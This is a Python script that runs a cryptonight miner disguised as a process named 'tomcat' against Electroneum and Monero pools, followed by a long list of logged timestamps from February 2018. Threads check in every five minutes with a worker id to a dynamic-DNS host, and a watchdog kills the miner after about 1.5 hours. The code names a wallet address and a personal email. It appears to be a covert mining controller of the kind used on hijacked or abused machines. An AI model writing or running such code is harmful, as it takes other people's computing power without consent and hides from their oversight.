import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:53:04.364990
#2018-02-17 17:39:03.670576
#2018-02-17 19:27:04.001423
#2018-02-17 21:16:06.297003
#2018-02-17 22:59:05.074509
#2018-02-18 00:47:06.107073
#2018-02-18 02:34:06.742292
#2018-02-18 04:21:07.219345
#2018-02-18 06:11:06.850215
#2018-02-18 08:00:09.106743
#2018-02-18 09:48:06.148951
#2018-02-18 11:35:08.031493
#2018-02-18 13:20:07.050142
#2018-02-18 15:10:07.495007
#2018-02-18 16:58:05.507813
#2018-02-18 18:46:01.612370
#2018-02-18 20:32:05.551618
#2018-02-18 22:17:05.058504
#2018-02-19 00:06:04.431536
#2018-02-19 01:52:05.684277
#2018-02-19 03:39:01.770446
#2018-02-19 05:24:01.254080
#2018-02-19 07:13:07.288971
#2018-02-19 09:03:04.410677
#2018-02-19 10:52:04.074657
#2018-02-19 12:42:04.543112
#2018-02-19 14:31:09.037017
#2018-02-19 16:19:05.647787
#2018-02-19 18:07:05.078749
#2018-02-19 19:54:04.578398
#2018-02-19 21:42:05.536587
#2018-02-19 23:29:01.683673
#2018-02-20 01:16:01.193248
#2018-02-20 03:06:08.255017
#2018-02-20 04:53:04.876681
#2018-02-20 06:35:07.319230
#2018-02-20 08:20:05.198000
#2018-02-20 10:05:06.028236
#2018-02-20 11:49:08.015421
#2018-02-20 13:37:06.946490
#2018-02-20 15:20:10.361475
#2018-02-20 17:05:07.500280
#2018-02-20 18:53:09.907868
#2018-02-20 20:43:05.757200
#2018-02-20 22:30:05.027556
#2018-02-21 00:13:01.343331
#2018-02-21 01:58:07.068622
#2018-02-21 03:47:03.774622
#2018-02-21 05:35:06.596970
#2018-02-21 07:24:23.005162
#2018-02-21 09:09:06.094858
#2018-02-21 10:57:08.590782
#2018-02-21 12:45:12.302882
#2018-02-21 14:33:04.969819
#2018-02-21 16:20:10.510926
#2018-02-21 18:11:09.797112
#2018-02-21 19:57:08.313781
#2018-02-21 21:46:01.834499
#2018-02-21 23:33:06.777185
#2018-02-22 01:21:04.343088
#2018-02-22 03:11:03.714555
#2018-02-22 04:57:05.434305
#2018-02-22 06:41:01.944385
#2018-02-22 08:29:02.197462
#2018-02-22 10:15:10.929580
#2018-02-22 12:01:06.929939
#2018-02-22 13:47:01.549849
#2018-02-22 15:35:10.384101
#2018-02-22 17:22:08.015517
#2018-02-22 19:09:04.692693
#2018-02-22 21:02:06.534989
#2018-02-22 23:59:04.019328
#2018-02-23 01:47:06.836392
#2018-02-23 03:34:05.623600
#2018-02-23 05:18:06.663422
#2018-02-23 07:04:04.374790
#2018-02-23 08:53:04.513128
#2018-02-23 11:16:06.850603
#2018-02-23 13:10:04.017025
#2018-02-23 14:54:01.359223
#2018-02-23 16:42:01.434299
#2018-02-23 18:28:06.011822
#2018-02-23 20:12:04.648942
#2018-02-23 22:01:06.465482
#2018-02-23 23:50:04.034813
#2018-02-24 01:40:10.898809
#2018-02-24 03:29:07.282735
#2018-02-24 05:15:03.945548
#2018-02-24 07:04:01.968817
#2018-02-24 08:36:04.024548
#2018-02-24 10:09:05.619683
#2018-02-24 11:57:05.981156
#2018-02-24 13:23:07.742928
#2018-02-24 14:55:01.495812
#2018-02-24 16:29:07.594592
#2018-02-24 18:05:04.199840
#2018-02-24 19:33:07.280970
#2018-02-24 21:08:03.493150
#2018-02-24 23:16:01.561170
#2018-02-25 03:25:04.269402
#2018-02-25 07:22:03.191051